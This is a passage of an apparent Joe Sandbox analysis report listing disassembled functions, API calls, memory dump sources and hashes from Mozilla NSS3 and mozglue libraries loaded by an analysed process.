                                                                                                                                                                                                                                                                                        • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C8C7060
                                                                                                                                                                                                                                                                                        • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C8C7087
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C8C70AF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2108637330-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 69823fecd5071ebf44e921a401c71a74152437c5fcab737c0a6bc142e4caa752
                                                                                                                                                                                                                                                                                        • Instruction ID: e5f1c75db99fcc945f434a99e24bb72a8584072e1b40747f0bfd6dc700985797
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 69823fecd5071ebf44e921a401c71a74152437c5fcab737c0a6bc142e4caa752
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5AA107B1B182059BFB209F24DE45B7A32A4DB8130CF248D3AE959CBB81E775D8458753
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7A6660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32(6C7CF618), ref: 6C7A6694
                                                                                                                                                                                                                                                                                        • GetThreadId.KERNEL32(?), ref: 6C7A66B1
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C7A66B9
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C7A66E1
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C7CF618), ref: 6C7A6734
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C7A673A
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C7CF618), ref: 6C7A676C
                                                                                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 6C7A67FC
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C7A6868
                                                                                                                                                                                                                                                                                        • RtlCaptureContext.NTDLL ref: 6C7A687F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                                                                                                                                                                                                                        • String ID: WalkStack64
                                                                                                                                                                                                                                                                                        • API String ID: 2357170935-3499369396
                                                                                                                                                                                                                                                                                        • Opcode ID: ff335c13c0a560607b318e3772c7949a297725d67a838e0f2254054072d980e3
                                                                                                                                                                                                                                                                                        • Instruction ID: 2deb4c9ea0c6383957187abbbb47895be7fcf0115d6f00f188c68599bac10109
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff335c13c0a560607b318e3772c7949a297725d67a838e0f2254054072d980e3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8851BE71A09701AFD711CF68CA44B9ABBF8BF89714F008A2DF59897640D770E609CB92
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C874CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PK11_SignatureLen.NSS3(?), ref: 6C874D80
                                                                                                                                                                                                                                                                                        • PORT_Alloc_Util.NSS3(00000000), ref: 6C874D95
                                                                                                                                                                                                                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C874DF2
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C874E2C
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C874E43
                                                                                                                                                                                                                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C874E58
                                                                                                                                                                                                                                                                                        • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C874E85
                                                                                                                                                                                                                                                                                        • DER_Encode_Util.NSS3(?,?,6C9C05A4,00000000), ref: 6C874EA7
                                                                                                                                                                                                                                                                                        • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C874F17
                                                                                                                                                                                                                                                                                        • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C874F45
                                                                                                                                                                                                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C874F62
                                                                                                                                                                                                                                                                                        • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C874F7A
                                                                                                                                                                                                                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C874F89
                                                                                                                                                                                                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C874FC8
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2843999940-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3396b6b36d0f4fd0b131617039788cf3033c50502de49a48071cdd265ff358ef
                                                                                                                                                                                                                                                                                        • Instruction ID: ee6e19c446f9f3cf55c3a11846abe99ef4afe9bbc0eeb89fda9cf8075f837a1f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3396b6b36d0f4fd0b131617039788cf3033c50502de49a48071cdd265ff358ef
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2818171A083019FE731CF28DA80B5EB7E4ABC5358F148929F958DB641F731E9048FA2
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C755E60 Relevance: 21.2, APIs: 14, Instructions: 182threadstringtimeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C755E9D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C7656EE,?,00000001), ref: 6C765B85
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765B50: EnterCriticalSection.KERNEL32(6C7CF688,?,?,?,6C7656EE,?,00000001), ref: 6C765B90
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765B50: LeaveCriticalSection.KERNEL32(6C7CF688,?,?,?,6C7656EE,?,00000001), ref: 6C765BD8
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765B50: GetTickCount64.KERNEL32 ref: 6C765BE4
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C755EAB
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C755EB8
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C755ECF
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C756017
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C744310: moz_xmalloc.MOZGLUE(00000010,?,6C7442D2), ref: 6C74436A
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C744310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C7442D2), ref: 6C744387
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000004), ref: 6C755F47
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C755F53
                                                                                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 6C755F5C
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C755F66
                                                                                                                                                                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C755F7E
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000024), ref: 6C755F27
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C75CA10: mozalloc_abort.MOZGLUE(?), ref: 6C75CAA2
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C78F968), ref: 6C755E8C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C78F968), ref: 6C75605D
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C78F968), ref: 6C7560CC
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3711609982-0
                                                                                                                                                                                                                                                                                        • Opcode ID: be5f49f302d8a5140115b20d8af7007c17b3a79458c1fb02f5cb23716d430723
                                                                                                                                                                                                                                                                                        • Instruction ID: e84f34966e69ba20ab1a927d71bd3c96b6497819f69e32de012831628fed3dc2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be5f49f302d8a5140115b20d8af7007c17b3a79458c1fb02f5cb23716d430723
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D71E4B06047418FD750DF28D584A6ABBF0FF59304F54493DE48A8BB52DB31EA58CB92
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C79D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C79D4F0
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C79D4FC
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C79D52A
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C79D530
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C79D53F
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C79D55F
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C79D585
                                                                                                                                                                                                                                                                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C79D5D3
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C79D5F9
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C79D605
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C79D652
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C79D658
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C79D667
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C79D6A2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2206442479-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 99667f58460a0c249e05e2719a8b1532548c23c7bb68e8e477841de01d1bdef4
                                                                                                                                                                                                                                                                                        • Instruction ID: 8d48de99252979f797df25cd4b8fc170e6b7ba301e4291f1679cb0d0fe7c78d6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99667f58460a0c249e05e2719a8b1532548c23c7bb68e8e477841de01d1bdef4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37515B71604706DFC704DF34C988A9ABBB8FF89358F108A2EE85A87711DB30B945CB91
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C8A6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C8A781D,00000000,6C89BE2C,?,6C8A6B1D,?,?,?,?,00000000,00000000,6C8A781D), ref: 6C8A6C40
                                                                                                                                                                                                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C8A781D,?,6C89BE2C,?), ref: 6C8A6C58
                                                                                                                                                                                                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C8A781D), ref: 6C8A6C6F
                                                                                                                                                                                                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C8A6C84
                                                                                                                                                                                                                                                                                        • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C8A6C96
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C851240: TlsGetValue.KERNEL32(00000040,?,6C85116C,NSPR_LOG_MODULES), ref: 6C851267
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C851240: EnterCriticalSection.KERNEL32(?,?,?,6C85116C,NSPR_LOG_MODULES), ref: 6C85127C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C851240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C85116C,NSPR_LOG_MODULES), ref: 6C851291
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C851240: PR_Unlock.NSS3(?,?,?,?,6C85116C,NSPR_LOG_MODULES), ref: 6C8512A0
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C8A6CAA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                                                                                                                                        • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                                                                                                                                        • API String ID: 4221828374-3736768024
                                                                                                                                                                                                                                                                                        • Opcode ID: b523e5d6233dc13825b7dfca5829fcda98fd5fca4ad08220849a33b8a3bbd0bd
                                                                                                                                                                                                                                                                                        • Instruction ID: f925f19632f3d47c4e18949d547205115c5bace051b7b1bc3cfa285faa95d557
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b523e5d6233dc13825b7dfca5829fcda98fd5fca4ad08220849a33b8a3bbd0bd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2801F2E170630177E76027FD2ECAF23315C9F81548F280831FE08E4989EA92EA1640A9
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C85ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 786543732-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 85c8371230b1fdec5799801b5490557530aca62009eb77a2464d793344ae1467
                                                                                                                                                                                                                                                                                        • Instruction ID: 484387e0be42da059629bdccb403f9f55211246775443bc59ce7bb1bd4e045fe
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85c8371230b1fdec5799801b5490557530aca62009eb77a2464d793344ae1467
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 555191B1B0511A9BDF60EF58CE856FE77B4BB06349F640825D804A3B01D3B1EA24CBE5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C765670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C7656D1
                                                                                                                                                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7656E9
                                                                                                                                                                                                                                                                                        • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C7656F1
                                                                                                                                                                                                                                                                                        • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C765744
                                                                                                                                                                                                                                                                                        • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C7657BC
                                                                                                                                                                                                                                                                                        • GetTickCount64.KERNEL32 ref: 6C7658CB
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C7CF688), ref: 6C7658F3
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C765945
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C7CF688), ref: 6C7659B2
                                                                                                                                                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C7CF638,?,?,?,?), ref: 6C7659E9
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                                                                                                                                                                                                                        • String ID: MOZ_APP_RESTART
                                                                                                                                                                                                                                                                                        • API String ID: 2752551254-2657566371
                                                                                                                                                                                                                                                                                        • Opcode ID: 7c35040172e925ff344435924e146efb6fbd511b2d250cd459f20984d584e574
                                                                                                                                                                                                                                                                                        • Instruction ID: 1cf5e7c0c0f190e1e28d900697973822453e61dfe3419603d96841892d04808e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c35040172e925ff344435924e146efb6fbd511b2d250cd459f20984d584e574
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5C1AD31A087419FCB05CF28C54066ABBF1FFCA714F058A2DE8C5A7B21D730A985DB82
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C934C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • sqlite3_value_text16.NSS3(?), ref: 6C934CAF
                                                                                                                                                                                                                                                                                        • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C934CFD
                                                                                                                                                                                                                                                                                        • sqlite3_value_text16.NSS3(?), ref: 6C934D44
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
